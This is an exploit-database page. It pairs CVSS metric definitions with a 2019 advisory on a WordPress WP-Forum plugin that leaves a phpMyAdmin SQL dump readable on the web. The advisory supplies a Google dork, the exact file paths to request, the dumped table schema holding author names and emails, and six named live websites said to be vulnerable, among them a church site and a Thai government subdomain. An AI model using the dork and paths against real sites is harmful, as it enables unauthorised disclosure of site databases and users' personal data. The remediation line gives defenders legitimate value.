The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
High
AC
The successful attack depends on the evasion or circumvention of security-enhancing techniques in place that would otherwise hinder the attack. These include: Evasion of exploit mitigation techniques. The attacker must have additional methods available to bypass security measures in place. For example, circumvention of address space randomization (ASLR) or data execution prevention must be performed for the attack to be successful. Obtaining target-specific secrets. The attacker must gather some target-specific secret before the attack can be successful. A secret is any piece of information that cannot be obtained through any amount of reconnaissance. To obtain the secret the attacker must perform additional attacks or break otherwise secure measures (e.g. knowledge of a secret key may be needed to break a crypto channel). This operation must be performed for each attacked target.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
None
I
There is no impact on the integrity of the system; the attacker does not gain the ability to modify any files or information on the target system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Below is a copy: WordPress 2.0.2 WP-Forum Plugins 1.7.8 Database Disclosure
###########################################################################
# Exploit Title : WordPress 2.0.2 WP-Forum Plugins 1.7.8 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 27/03/2019
# Vendor Homepage : wordpress.org
# Software Information Link :
github.com/motdotla/annmotte.com/blob/master/wp-content/plugins/wp-forum/forum_db.txt
wordpress.org/plugins/tags/wp-forum/
# Software Affected Version : WordPress 2.0.2 and 2.1 / Plugin Version 1.7.8
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : forum_db.txt inurl:/wp-content/plugins/wp-forum/
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Information Link about phpMyAdmin SQL dump File =>
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
###########################################################################
# Information About Software :
****************************
Simple discussion forum plugin for WordPress. With support for different skins, 3 included
by default, changeable from the WP admin interface. Admin can choose if unregistered posting is
allowed and Captcha (optional) is used for spam control. Tight interaction with Wordpress
makes an easy to use and administer plugin.
# Installation :
*************
1. Rename wpforum to wp-forum and copy it to to wp-content/plugins
1. Go and activate the plugin
1. Create a page from the Manage tab
1. Click on the HTML button in Wordpress and then insert: `<!--WPFORUM-->`
1. Go to manage->wp-forum and start adding groups and forums.
1. You must then visit the WP-Forum options panel in WP admin.
1. Setup a link to your forum (unless you have your pages auto-linking in the navigation menu)
1. To show the latest acitvity in the sidebar add this code:
`<?php forum_latest_acivity(numbers_to_show);?>` where numbers_to_show is an actual number like 1,2,3
1. If you upload a new version go to plugin managment and deactivate and
the activate WP-Forum. Visit the structure page of the wp-forum management.
###########################################################################
# Impact :
***********
* An information exposure is the intentional or unintentional disclosure of information to
an actor that is not explicitly authorized to have access to that information.
* The product stores sensitive information in files or directories that are accessible
to actors outside of the intended control sphere.
* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of
MySQL over the World Wide Web. It can be used to dump a database or a collection of databases
for backup or transfer to another SQL server (not necessarily a MySQL server).
The dump typically contains SQL statements to create the table, populate it, or both.
This file contains an phpMyAdmin SQL dump. This information is highly sensitive
and should not be found on a production system.
Remediation : Restrict access to this file or remove it from the system.
###########################################################################
# Database Disclosure Exploit :
***************************
/wp-content/plugins/wp-forum/forum_db.txt
/wp-content/plugins/wp-form/wpforum/forum_db.txt
# Information :
**************
-- phpMyAdmin SQL Dump
-- version 2.7.0-pl2
-- phpmyadmin.net
--
-- Host: localhost
-- Server version: 5.0.19
-- PHP Version: 5.1.4
--
-- Database: `wordpress`
--
-- --------------------------------------------------------
--
-- Table structure for table `wp_forum_forums`
--
CREATE TABLE `wp_forum_forums` (
`id` int(11) NOT NULL auto_increment,
`name` varchar(255) NOT NULL default '',
`parent_id` int(11) NOT NULL default '0',
`description` varchar(255) NOT NULL default '',
`views` int(11) NOT NULL,
PRIMARY KEY (`id`)
) ;
-- --------------------------------------------------------
--
-- Table structure for table `wp_forum_groups`
--
CREATE TABLE `wp_forum_groups` (
`id` int(11) NOT NULL auto_increment,
`name` varchar(255) NOT NULL default '',
PRIMARY KEY (`id`)
) ;
-- --------------------------------------------------------
--
-- Table structure for table `wp_forum_posts`
--
CREATE TABLE `wp_forum_posts` (
`id` int(11) NOT NULL auto_increment,
`author_name` varchar(255) default NULL,
`author_email` varchar(255) default NULL,
`author_web` varchar(255) default NULL,
`text` longtext,
`thread_id` int(11) NOT NULL default '0',
`date` datetime NOT NULL default '0000-00-00 00:00:00',
`author_id` int(11) NOT NULL,
`subject` varchar(255) NOT NULL,
`views` int(11) NOT NULL,
PRIMARY KEY (`id`)
) ;
-- --------------------------------------------------------
--
-- Table structure for table `wp_forum_threads`
--
CREATE TABLE `wp_forum_threads` (
`id` int(11) NOT NULL auto_increment,
`forum_id` int(11) NOT NULL default '0',
`views` int(11) NOT NULL default '0',
`subject` varchar(255) NOT NULL default '',
`date` datetime NOT NULL default '0000-00-00 00:00:00',
PRIMARY KEY (`id`)
) ;
###########################################################################
# Example Vulnerable Sites :
*************************
[+] centres-animation-quartiers-bordeaux.eu/wp-content/plugins/wp-forum/forum_db.txt
[+] thebrashbrothers.com/wp-content/plugins/wpforum/forum_db.txt
[+] dgerard.com/news.41clubs.be/wp-content/plugins/wp-forum/forum_db.txt
[+] ridceo.rid.go.th/udornth/xxnongkungthanasan/wp-content/plugins/wp-form/wpforum/forum_db.txt
[+] templebaptistchurchonline.com/wordpress/wp-content/plugins/wp-forum/forum_db.txt
[+] templebaptist.church/wordpress/wp-content/plugins/wp-forum/forum_db.txt
###########################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###########################################################################